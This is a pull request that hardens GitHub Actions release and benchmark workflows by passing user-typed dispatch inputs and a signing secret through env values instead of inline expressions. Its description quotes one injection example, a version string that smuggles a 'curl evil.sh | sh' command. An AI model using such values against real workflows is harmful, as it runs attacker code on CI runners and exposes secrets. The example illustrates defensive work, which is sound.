### PR TITLE
Read workflow inputs as values, not as script

### DIFF
--- a/.github/workflows/bench-remote.yml
+++ b/.github/workflows/bench-remote.yml
@@ -65,12 +65,18 @@ jobs:
           ./Scripts/bench-remote-ls.sh 2>&1 | tee "$RUNNER_TEMP/bench.txt"
       - name: Publish results to the run summary
         if: always()
+        # Same reason the step above passes the inputs as env: whoever clicks
+        # Run types these, and `${{ inputs.x }}` inlined here would be spliced
+        # into the script itself rather than read as a value.
+        env:
+          BENCH_FILES: ${{ inputs.files }}
+          BENCH_RTTS: ${{ inputs.rtts }}
         run: |
           {
             echo "## restic ls latency"
             echo
             echo "restic: \`$(restic version)\`"
-            echo "dataset: ${{ inputs.files }} files · rtts: ${{ inputs.rtts }} ms"
+            echo "dataset: $BENCH_FILES files · rtts: $BENCH_RTTS ms"
             echo
             echo '```'
             # Strip the bold escape sequences the script prints for terminals.

--- a/.github/workflows/release.yml
+++ b/.github/workflows/release.yml
@@ -61,9 +61,14 @@ jobs:
 
       - name: Resolve version
         id: version
+        # inputs.version is free text typed by whoever clicked Run, so it
+        # arrives as an env value rather than inlined into the script — the
+        # regex below is what makes it trustworthy for every later step.
+        env:
+          INPUT_VERSION: ${{ inputs.version }}
         run: |
-          if [ "${{ github.event_name }}" = "workflow_dispatch" ]; then
-            VERSION="${{ inputs.version }}"
+          if [ "$GITHUB_EVENT_NAME" = "workflow_dispatch" ]; then
+            VERSION="$INPUT_VERSION"
           else
             VERSION="${GITHUB_REF_NAME#v}"
           fi
@@ -153,7 +158,15 @@ jobs:
             echo "flags=" >> "$GITHUB_OUTPUT"
           fi
 
+      # The team ID is a secret, so it reaches xcodebuild through the
+      # environment rather than being pasted into the command line — the same
+      # rule the app itself follows for restic's credentials.
       - name: Build Release
+        env:
+          SIGN_IDENTITY: ${{ steps.signing.outputs.identity }}
+          SIGN_FLAGS: ${{ steps.signing.outputs.flags }}
+          TEAM_ID: ${{ secrets.APPLE_TEAM_ID }}
+          VERSION: ${{ steps.version.outputs.version }}
         run: >
           xcodebuild
           -project Keelhaven.xcodeproj
@@ -162,11 +175,11 @@ jobs:
           -derivedDataPath build
           build
           CODE_SIGN_STYLE=Manual
-          CODE_SIGN_IDENTITY="${{ steps.signing.outputs.identity }}"
-          DEVELOPMENT_TEAM="${{ secrets.APPLE_TEAM_ID }}"
-          OTHER_CODE_SIGN_FLAGS="${{ steps.signing.outputs.flags }}"
-          MARKETING_VERSION=${{ steps.version.outputs.version }}
-          CURRENT_PROJECT_VERSION=${{ github.run_number }}
+          CODE_SIGN_IDENTITY="$SIGN_IDENTITY"
+          DEVELOPMENT_TEAM="$TEAM_ID"
+          OTHER_CODE_SIGN_FLAGS="$SIGN_FLAGS"
+          MARKETING_VERSION="$VERSION"
+          CURRENT_PROJECT_VERSION="$GITHUB_RUN_NUMBER"
           ARCHS="arm64 x86_64"
           ONLY_ACTIVE_ARCH=NO
 

--- a/.github/workflows/release.yml
+++ b/.github/workflows/release.yml
@@ -166,7 +166,9 @@ jobs:
           SIGN_IDENTITY: ${{ steps.signing.outputs.identity }}
           SIGN_FLAGS: ${{ steps.signing.outputs.flags }}
           TEAM_ID: ${{ secrets.APPLE_TEAM_ID }}
-          VERSION: ${{ steps.version.outputs.version }}
+          # Not plain VERSION: every name here lands in xcodebuild's whole
+          # environment, where a build phase could pick it up as $(VERSION).
+          APP_VERSION: ${{ steps.version.outputs.version }}
         run: >
           xcodebuild
           -project Keelhaven.xcodeproj
@@ -178,7 +180,7 @@ jobs:
           CODE_SIGN_IDENTITY="$SIGN_IDENTITY"
           DEVELOPMENT_TEAM="$TEAM_ID"
           OTHER_CODE_SIGN_FLAGS="$SIGN_FLAGS"
-          MARKETING_VERSION="$VERSION"
+          MARKETING_VERSION="$APP_VERSION"
           CURRENT_PROJECT_VERSION="$GITHUB_RUN_NUMBER"
           ARCHS="arm64 x86_64"
           ONLY_ACTIVE_ARCH=NO


### PR DESCRIPTION
First of three passes over the 17 open [code scanning alerts](https://github.com/shenxianpeng/keelhaven/security/code-scanning). This one takes the group with a real attack surface.

## What was wrong

Three alerts are the same shape (`githubactions:S7630`, all rated high): text a person types into a `workflow_dispatch` form, inlined into a `run:` block. The runner substitutes it *before* bash sees the script, so a version of `1.0.0"; curl evil.sh | sh; :"` executes.

- `release.yml` — `inputs.version` in **Resolve version**
- `bench-remote.yml` — `inputs.files` and `inputs.rtts` in **Publish results to the run summary**

Reaching it needs dispatch rights on the repo, so this is hardening rather than an open hole — but "you'd need write access anyway" is not the boundary a release workflow should lean on.

A fourth alert (`S7636`, medium) sits in the same file: `secrets.APPLE_TEAM_ID` pasted onto xcodebuild's command line.

## What changed

All four now travel as `env:` values, which bash reads as data. Nothing else moves:

- `bench-remote.yml`'s own **Run benchmark** step was already doing this — the summary step just hadn't followed. The fix is to copy the pattern from four lines above it.
- `release.yml`'s `^[0-9]+\.[0-9]+\.[0-9]+$` gate is untouched, and still the thing that makes the version trustworthy for every later step.
- The team ID reaches xcodebuild through the environment instead of argv — the same rule the app itself follows for restic's repository passwords.
- `github.event_name` and `github.run_number` became the built-in `$GITHUB_EVENT_NAME` / `$GITHUB_RUN_NUMBER` while nearby, so those steps read one way throughout.

## Verification

Both files parse; no `${{ inputs.* }}` or `${{ secrets.* }}` remains inside any `run:` block anywhere in `.github/workflows/`. Neither workflow runs on PRs, so CI can't exercise them here — the next manual dispatch is the live check, and the signing branch stays dormant until Apple secrets exist.

## Still open, in the next two PRs

- **3 × high** — pin `softprops/action-gh-release`, `peaceiris/actions-gh-pages` and the `shenxianpeng/.github` reusable workflow to full SHAs. Needs a `dependabot.yml` alongside, or they freeze at today's version.
- **9 × medium** — `--proto '=https'` on seven `curl` calls, `--ignore-scripts` on two `npm ci` calls (wants a real VitePress build to confirm nothing depends on a lifecycle script).
- **1 × medium, a false positive** — `ci.yml`'s "dependencies without locked versions" points at `swift build`; KeelhavenCore has no external dependencies at all. Worth dismissing in SonarCloud rather than working around.